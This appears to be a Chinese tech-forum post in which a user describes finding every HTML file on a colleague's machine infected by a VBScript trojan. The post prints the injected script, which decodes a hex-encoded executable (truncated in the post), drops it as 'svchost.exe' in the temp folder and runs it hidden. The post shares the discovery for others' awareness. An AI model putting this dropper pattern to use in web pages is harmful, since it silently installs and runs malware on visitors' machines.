逮到一个疑是感染html,htm,网页文件的木马

事情是这样子的
远程帮同事搞进销存软件 ,发现软件打开不正常了
如图


  
"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“

我选择继续,是
如下图  



“当前页面脚本发生错误。%1不是有效的win32应用程序。”
这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的  

我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下



在html文件尾部被添加了如下代码
[Visual Basic] 纯文本查看 复制代码

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000...........后面还有很多"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

  
用文本记事本打开一串字符,打开会乱码

这个代码目的是什么吗?只感染一个软件 ?然后检查所有的html文件,
发现所有的html 网页文件全部被修改添加了 ,如图





全盘的文件无一幸免,我不懂编程,但知道这是VBS代码,应该有一段时间了的,本地安装了3X0全家桶的,但好像没有阻止
现在正在挂了一个Win 10 ,用Windows Defender 安全中心扫描中



微软自家产品还是可以的
论坛上也有类似的案例,前面我搜索了一下2015年时候就有类似案例的VBS木马(应该算木马)
我这边发帖子,分享整个问题发现的过程 ,从软件打开异常,发现html网页有问题,第一次发帖子,来支持论坛
PS: 感觉国产杀毒软件(3X0,等不怎么靠谱)

THE END
喜欢就支持以下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称